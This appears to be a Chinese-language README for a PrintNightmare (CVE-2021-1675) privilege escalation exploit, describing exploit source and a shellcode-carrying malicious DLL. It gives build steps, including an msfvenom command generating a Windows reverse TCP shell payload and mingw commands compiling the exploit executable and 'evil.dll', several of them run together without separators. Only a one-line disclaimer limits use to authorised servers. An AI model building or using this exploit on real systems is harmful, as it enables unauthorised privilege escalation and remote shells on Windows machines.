
src/nightmare.cpp:利用 CVE-2021-1675 获取系统访问权限的源代码 通过安装恶意 dll src/payload-dll.cpp:在入口函数中包含恶意 shellcode 的 dll 源代码
!!仅允许在您拥有测试权限的服务器上使用
CVE-2021-1675 是 Microsoft Windows 打印后台处理程序服务中的一个漏洞, 该漏洞允许攻击者绕过 SeLoadDriverPrivilege 检查。通过安装一个 调用 shellcode 或使用 Windows API 建立反向 shell 连接的恶意 DLL,可以利用此漏洞在目标机器上实现权限提升。2021 年 6 月 8 日之前的 Windows 10/8/Server 2008/Server 2012 版本均受影响。
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f cx86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspoolx86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -sharedzip ./bin/PrinterNightmareLPE.exe ./lib/